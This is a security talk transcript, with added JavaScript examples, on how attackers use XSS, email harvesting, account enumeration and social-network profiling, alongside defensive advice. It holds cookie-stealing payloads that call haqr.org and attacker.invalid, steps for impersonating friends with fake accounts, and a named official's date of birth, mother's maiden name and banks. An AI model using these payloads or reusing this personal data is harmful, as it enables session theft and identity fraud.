Anti Social Networking? Ken Munro, SecureTest Ltd (PowerPoint presentation transcript)

Transcript and Presenter's Notes

1
Anti Social Networking?
Ken Munro
SecureTest Ltd
2
Who are we?
  • SecureTest
  • Penetration testers
  • Largest test team in Europe
  • CHECK, CREST and PCI accredited
  • Look at the real world of security too
  • Not just the latest and greatest exploit
  • Though we do a bit of that as well!

3
Why does this interest me?
  • It's not so easy to hack a given site any more
  • Though web apps often give way
  • Script kiddie hacking is moving towards SMEs
  • VISA noted that over 80% of attacks involving
    card data theft were against level 4 merchants under PCI
  • So the big prizes aren't as easy to get
  • Which means the attacker needs more information, and
    needs to exploit new attack vectors

4
Email
5
Email borne attacks
  • Phishing scatter gun
  • Too easy to spot
  • At least for those who know how

6
A poor example
7
View HTML source
8
Looks a bit phishy!
9
Email borne attacks
  • Cross site scripting
  • Executable javascript code, usually contained in
    a URI
  • Follow the link from a plausible email that you
    received
  • And watch as your session cookie gets pinched

10
A better example. Would you click?
11
Some sample XSS code
  • How to steal MySpace sessions
  • Promise you wont try this at home!
  • javascript:var a=document.cookie.split(";");var msg="";for(var i=0;i<a.length;i++){msg+=a[i]+"\n";}alert(msg);
    (the body of the for loop was lost in the transcript; the version above is the
    obvious reconstruction, listing each cookie before alerting it)
  • new Image().src="http://haqr.org/steal?c="+encodeURI(document.cookie)

12
Last month: the first high-profile use of XSS
13
How it was done
  • Creates a fake login form, in the victim's browser
    instance
  • Redirects form input to third party
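The two delivery tricks above, reflected input turned into script and a javascript: URI in a link, come down to the same server-side mistake: untrusted data dropped into markup unescaped. The following is an added example, not code from the presentation, showing a reflected "welcome" page rendered the vulnerable way and the hardened way. The hostname attacker.invalid, the handler names and the payload strings are all placeholders constructed for the example.

```javascript
// Added example (not code from the presentation): the same reflected-input
// bug rendered two ways. "attacker.invalid" is a placeholder host.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Escape untrusted data for the HTML text and double-quoted attribute contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Allow-list the URL scheme of an href. Browsers ignore leading whitespace and
// ASCII control characters inside the scheme, so " JaVa\tScRiPt:" still runs;
// strip those before looking at the scheme. No scheme means a relative URL,
// which is allowed. Anything else (javascript:, data:, vbscript:) becomes "#".
function safeHref(url) {
  const probe = String(url).replace(/[\u0000-\u0020\u007f]/g, "").toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(probe);
  if (m && m[1] !== "http" && m[1] !== "https") return "#";
  return String(url);
}

// Vulnerable: query parameters dropped straight into markup.
function renderVulnerable(name, next) {
  return `<p>Welcome back, ${name}</p><a href="${next}">Continue</a>`;
}

// Hardened: every interpolation is escaped for its context, and the link
// target is scheme-checked before it is escaped.
function renderHardened(name, next) {
  return `<p>Welcome back, ${escapeHtml(name)}</p>` +
         `<a href="${escapeHtml(safeHref(next))}">Continue</a>`;
}

// Constructed payloads of the two kinds the slides describe: a cookie-stealing
// script tag, and a fake login form overlaid on the genuine page.
const COOKIE_THEFT = '<script>new Image().src="http://attacker.invalid/steal?c="' +
                     '+encodeURI(document.cookie)</script>';
const FAKE_FORM = '</p><form action="http://attacker.invalid/login" method="post">' +
                  'Session expired, please sign in again: <input name="user">' +
                  '<input name="pass" type="password"><input type="submit"></form><p>';
const JS_URI = " JaVa\tScRiPt:alert(document.cookie)";

function demo() {
  return {
    vulnerable: renderVulnerable(COOKIE_THEFT, JS_URI),
    hardened: renderHardened(FAKE_FORM, JS_URI),
  };
}
console.log(demo());
```

The scheme check is deliberately conservative: a mailto: or ftp: link is also reduced to "#", which is the right default for a parameter that only ever needs to point back into the application. Escaping alone would not have saved the href, because a javascript: URI contains nothing that HTML escaping touches.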

14
Why XSS in a presentation about social networking?
  • We know what the threat is
  • Credential theft, account compromise, session
    stealing
  • Anything you can do with javascript, they can do
    better
  • But how do you deliver it?
  • If you send your attack out scatter gun
  • It'll quickly be picked up
  • ISPs, anti phishing services, the target
    organisation (perhaps a bank?)
  • So if your attack is going to succeed, you need
    to send it to a small number of users of that
    (online banking?) application
  • So where do you find your victims to target?

15
Who needs a social networking site?
  • Everyone overlooks Google, with the hype around
    Facebook etc
  • And FriendsReunited!
  • Fun with Google Groups and Blogs
  • Try searching Google Groups for
  • @yourcompany.com
  • See what you find
  • Almost invariably we collect large numbers of
    email addresses, usually involving IT-related
    queries

16
Googler
  • Making it even easier
  • Googler.py is a Python script we wrote which
    searches Google and filters the results
  • Anything that Google has indexed with your email
    domain in
  • Web sites with contact details
  • Forums
  • Newsgroups etc

17
Googler survey
  • Quick look at the email domains of 10 companies
    in the FTSE.
  • 10 minutes' work had 1,047 individuals' work email
    addresses
  • Aliases help prevent name disclosure
  • But they don't stop the email getting there

18
Email address disclosure
  • The target list for your targeted attack
  • Some organisations are vastly better than others
  • At the very least, use aliases
  • Though that doesn't stop the email from getting
    to someone
  • You just don't know who to!
  • Obfuscate any public postings (RIPE etc)
  • Use anonymous web mail accounts to make postings
    with
  • And dont mention the company name in the
    posting!
  • Check exposure every quarter
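The filtering half of the Googler approach, and the quarterly exposure check recommended above, is a matter of pulling every mailbox at your domain out of whatever text the search engine returned, including the "(at)" and "_at_" spellings people use to dodge harvesters. The following is an added example in JavaScript, not the SecureTest Googler.py script; the search results are a constructed sample and example.com is the assumed target domain.

```javascript
// Added example (not the SecureTest Googler.py script): the filtering half of
// that approach. Input is text already retrieved from search results; the
// sample below is constructed, and example.com is the target domain.

function escapeRe(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// Build one regex that matches local@domain for the target domain only,
// tolerating the common anti-harvesting spellings of "@" and ".".
function addressPattern(domain) {
  const at = String.raw`\s*(?:@|\(at\)|\[at\]|_at_|\s+at\s+)\s*`;
  const dot = String.raw`\s*(?:\.|\(dot\)|\[dot\]|\s+dot\s+)\s*`;
  const domainPat = domain.toLowerCase().split(".").map(escapeRe).join(dot);
  // The trailing lookahead rejects longer domains such as example.com.au.
  return new RegExp(
    String.raw`([a-z0-9][a-z0-9._%+-]*)` + at + domainPat + String.raw`(?!\.?[a-z0-9-])`,
    "gi"
  );
}

// Return the unique, normalised mailboxes found for the domain, sorted.
// Subdomains (x@sub.example.com) are a different domain and need their own run.
function harvest(text, domain) {
  const re = addressPattern(domain);
  const found = new Set();
  let m;
  while ((m = re.exec(text)) !== null) {
    found.add(`${m[1].toLowerCase()}@${domain.toLowerCase()}`);
  }
  return [...found].sort();
}

// Constructed sample of what indexed newsgroup and forum posts look like.
const SAMPLE = `
From: Alice Smith <alice.smith@example.com> to uk.comp.security: "our firewall is dropping..."
Contact bob (at) example (dot) com re the Exchange 2003 migration
Posted by carol_at_example.com, 12:05: anyone seen this Cisco VPN error?
Also indexed but not ours: dave@example.com.au, mallory@notexample.com
Duplicate with different case: ALICE.SMITH@EXAMPLE.COM
`;

console.log(harvest(SAMPLE, "example.com"));
```

Run the same function over each quarter's results and diff the sorted lists: new entries are new disclosures to chase, and the posts they came from tell you which staff need the "don't use your work address" reminder.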

19
But that was only corporate addresses
  • If we're trying to deliver an attack, we need to
    know it works on customers of the organisation
    we're targeting
  • How about compromising customers of Amazon?
  • We need their email addresses, but a Google
    search wouldn't tell us if they were customers

20
Authentication
21
(No Transcript)
22
(No Transcript)
23
(No Transcript)
24
Enumeration
  • Gives you the email addresses of the online
    store's customers
  • Perfect for delivering your attack, exploiting an
    XSS on the store's web site
  • Accounts compromised, customers' details stolen
  • Processes for dealing with failed authentication
    or resets are often the weak point
  • Results of our annual survey showed 62% of major
    online retailers had the same problem
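The weak point named above is usually a reset or login response that says one thing for a registered address and another for an unknown one. The following is an added example, not code from the presentation: a leaky password-reset handler, the uniform-response version, and the differential check that an attacker (or your own annual survey) would run against it. The user store, the candidate list and the example.invalid canary address are all constructed.

```javascript
// Added example (not code from the presentation): a password-reset endpoint
// that acts as an account oracle, the uniform-response version, and the
// differential test that tells them apart. The user store is constructed.

const REGISTERED = new Set(["alice@example.com", "bob@example.com"]);
const outbox = []; // stands in for the mail queue

// Leaky: existence of the account is visible in status code and wording.
function resetLeaky(email) {
  if (!REGISTERED.has(email)) {
    return { status: 404, body: "No account exists for that e-mail address" };
  }
  outbox.push(email);
  return { status: 200, body: "A password reset link has been sent" };
}

// Uniform: same status and wording whether or not the account exists. The
// real work (sending mail) is a side effect the caller cannot observe; in a
// real service it should also run off the request path, otherwise response
// time becomes the oracle instead of the message text.
function resetUniform(email) {
  if (REGISTERED.has(email)) outbox.push(email);
  return { status: 200, body: "If that address is registered, a reset link has been sent" };
}

// Attacker's (or auditor's) view: compare each candidate's response with the
// response for an address that certainly does not exist. Any candidate whose
// response differs has just been confirmed as a customer.
function confirmedAccounts(handler, candidates) {
  const fingerprint = (r) => `${r.status}|${r.body}`;
  const baseline = fingerprint(handler("nobody-" + Date.now() + "@example.invalid"));
  return candidates.filter((c) => fingerprint(handler(c)) !== baseline);
}

// A harvested list: two real customers and one address that is not.
const CANDIDATES = ["alice@example.com", "carol@example.com", "bob@example.com"];

console.log("leaky:", confirmedAccounts(resetLeaky, CANDIDATES));
console.log("uniform:", confirmedAccounts(resetUniform, CANDIDATES));
```

The same differencing works against login ("unknown user" versus "wrong password") and against registration ("that address is already in use"); registration is the hardest to make uniform, which is why the reset and login paths at least should not give the game away.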

25
But we really want to steal everything
  • So how do we steal the victim's identity?
  • Could intercept their post or rubbish
  • I don't like getting my hands dirty!

26
How do people authenticate?
  • Employee ID?
  • Mother's maiden name
  • Date of birth
  • Employment start date
  • Home post code
  • Place of birth
  • Some form of challenge/response?
  • Any more?
  • Shouldn't this information be hard to obtain?
  • Call the target, claim to be their bank, ask them
    to authenticate!

27
An example
  • A public figure
  • The Information Commissioner
  • But he doesn't have a Facebook or MySpace
    account
  • Who cares?

28
http://www.ico.gov.uk/about_us/who_we_are/management_board.aspx
29
http://politics.guardian.co.uk/foi/story/0,,1518657,00.html
  • Lives in Reigate
  • Age 56 in 2005
  • Brought up in Southend
  • Children: Andrew, Gemma and Chris
  • Career history
  • Southampton Uni
  • Boarded at Bishops Stortford

30
Too easy!
31
http://p10.hostingprod.com/@spyblog.org.uk/blog/foia/information_commissioner/
  • Date of Birth
  • 18th June 1949
  • More information was disclosed in this FOI
    request than actually requested!

32
Other useful information
  • Movements
  • Office address in Cheshire, where he works two
    days per week, and two days/week in London. He flies
    from Gatwick to Manchester
  • Work email address
  • Richard.thomas@ico.gsi.gov.uk
  • Married Julia Clarke in 1974 in Bracknell
  • A partner at Clifford Chance?
  • Mother's maiden name?

33
192.Com search of births
34
The actual register entry for the ICO's birth
  • Mothers maiden name is James

35
And where he banks
  • Coventry Building Society (savings)
  • Nationwide Building Society (savings)
  • National Savings (Equity Bond)
  • Invesco Perpetual (ISA investment)
  • Scottish Widows (Personal Pension and Endowment)

  • Edinburgh Portfolio (Personal Pension)
  • Standard Life (Personal Pension and Endowment)
  • Merrill Lynch (Personal Pension)
  • All the above contain 25K
  • All because of Reigate

36
But that was too easy
  • Not everyone is a public figure
  • Few of us have to disclose information by
    statute
  • Though seemingly innocent information about
    ourselves can provide the links that the attacker
    needs
  • Does it matter that you live in Reigate, have 3
    children and a wife called Julia?
  • Why give away that information if you don't need
    to?
  • Time to profile yourselves

37
Social Networking?
38
Facebook and MySpace
  • These are excellent sources of information about
    people who arent in the public eye
  • MySpace is easier, as it's rare to find pages
    that are protected
  • It's also more popular!
  • Facebook is a little harder, as one usually has
    to be a friend of the target
  • An example of the information one can get

39
(No Transcript)
40
How do we get access to the profile?
  • In most cases, we can only see the friends of
    the victim, not their profile, unless we're their
    friend
  • So we create a fake account in the name of one of
    their friends
  • Copy the photograph from the real friend
  • Add the target to our friends, with a covering
    message
  • "I've set up a new profile"
  • And the victim accepts us

41
Forged invite (Using a fake account)
42
Now we've got his email address
  • Let's see if he has an account on Amazon
  • LinkedIn
  • MySpace
  • GoogleMail
  • Harder
  • Now we can guess the password against whichever of the
    above doesn't have a lockout on the login
  • I wonder if he uses common passwords?

43
The Profile Menu
  • Ensure that all categories are set so only
    recognised friends or where possible yourself or
    no one can see information
  • Concentrate on areas relating to contact
    information as these can be used in social
    engineering
  • De-activate your wall

44
The Search Menu
  • Ensure only friends can locate you in a search
  • Prevent any other users from viewing any aspect
    of your profile
  • This will prevent new friends contacting you,
    allowing secure associations to be made

45
The News Feed Menu
  • Uncheck all boxes to prevent friends monitoring
    your application usage and contacts

46
The Poke, Message and Friend Request Menu
  • Prevent anyone you contact from viewing your
    profile

47
And Finally
  • Do not install any applications
  • This can allow information leakage and tracking
    of your Facebook usage
  • Be careful who you choose as friends
  • Make sure the person you add is the person you
    think it is!
  • Preferably speak to them in person or over the
    phone to confirm their identity before accepting
    them.

48
Facebook and Wireless hot spots
  • Facebook authentication is encrypted (HTTPS)
  • But for performance, it drops back to HTTP after
    authentication, so the session cookie travels in clear
  • So, in an environment where traffic sniffing is
    possible
  • Hot spot
  • Hub network
  • Shared internet connection
  • ISP staff
  • ARP-spoofed switched network
  • Anyone can sniff your exchanges on Facebook
  • And Messenger conversations
  • And unencrypted logins
  • And so on
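Whether a session survives the drop back to HTTP is decided by two cookie attributes, and both can be checked from a single captured response. The following is an added example, not code from the presentation: a small Set-Cookie parser and an audit that reports session cookies missing the Secure flag (the browser will send them over the plain-HTTP pages the slide describes) or the HttpOnly flag (injected script can read them). The response, its cookie names and its Location header are a constructed sample, not real Facebook traffic.

```javascript
// Added example (not code from the presentation): audit the Set-Cookie
// headers of a captured response. The response is a constructed sample.

// Parse one Set-Cookie header value into name, value and the two flags that
// matter here. The first "=" separates name from value; a value may itself
// contain "=", so only that first one is split on.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1), secure: false, httpOnly: false };
  for (const a of attrs) {
    const key = a.split("=")[0].trim().toLowerCase();
    if (key === "secure") cookie.secure = true;
    else if (key === "httponly") cookie.httpOnly = true;
  }
  return cookie;
}

// Walk a raw response head and report findings for the named session cookies.
function auditResponse(rawHead, sessionNames) {
  const findings = [];
  for (const line of rawHead.split(/\r?\n/)) {
    if (!/^set-cookie:/i.test(line)) continue;
    const c = parseSetCookie(line.slice(line.indexOf(":") + 1));
    if (!sessionNames.includes(c.name)) continue;
    if (!c.secure) findings.push(`${c.name}: no Secure flag, sent over plain HTTP`);
    if (!c.httpOnly) findings.push(`${c.name}: no HttpOnly flag, readable by injected script`);
  }
  return findings;
}

// Constructed: the post-login redirect drops the user back onto http://, and
// the session cookies it sets will follow the user there.
const SAMPLE_RESPONSE = [
  "HTTP/1.1 302 Found",
  "Location: http://www.example.com/home",
  "Set-Cookie: sid=5f3a9c0e; Path=/; Domain=.example.com; HttpOnly",
  "Set-Cookie: xs=d41d8cd9; Path=/; Domain=.example.com",
  "Set-Cookie: locale=en_GB; Path=/; Secure",
  "",
].join("\r\n");

console.log(auditResponse(SAMPLE_RESPONSE, ["sid", "xs"]));
```

Run it against the login response of any application you are assessing; a session cookie without Secure on a site that serves any page over HTTP is exactly the hot-spot exposure above, and the sniffer does not need to see the login to take over the session.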

49
New developments
  • Web applications are becoming available that can
    carry out much of the profiling automatically
  • Take a look at Maltego (www.paterva.com)
  • www.pipl.com searches the deep web, the part of
    the Internet that Google doesn't index
  • It uses numerous public information resources to
    profile people and organisations
  • The above will submit your query to other
    engines
  • In their infancy, but rather scary
  • They are capable of an uncanny degree of
    vulnerability discovery

50
So what?
  • What did we actually achieve?
  • Does anyone really care?
  • Would your bank / credit card provider refund
    spending made on your card in the event of ID
    theft?
  • What about the company you work for?
  • The bar has been raised for hackers, but at the
    same time new sources of the information they
    need have become available

51
Somebody cared enough
  • Yaron Bolandi
  • Charged with crimes relating to the £220M near-theft
    at Sumitomo Mitsui
  • Social engineering and keylogging

52
Ideas that may help
  • Facebook can easily be configured not to show
    friends
  • If you can't access the profile, most of the
    problem is solved
  • Preventing access from the corporate network is
    another matter!
  • People often forget old profiles from
    out-of-favour networking sites
  • Friends Reunited, for example
  • Stop staff making postings or otherwise
    disclosing their work email addresses
  • Easily checked for
  • Join groups relating to your organisation; it may be
    worth reviewing what's being said/disclosed about
    your business

53
Thoughts
  • Hard to block Facebook access
  • Particularly if it becomes a business networking
    tool
  • How about blocking the Facebook email domain
    using your mail filters?
  • An easy way to social engineer information out of
    your staff
  • At least Facebook has some protection, though
    it's easily bypassed
  • Staff education, sadly, is one of the few
    defences
  • Profile your business (Facebook groups), profile
    yourself
  • See how deep the wormhole goes

54
Any Questions?
Slides available on request: ken.munro@securetest.com
And NO, I don't have a Facebook account!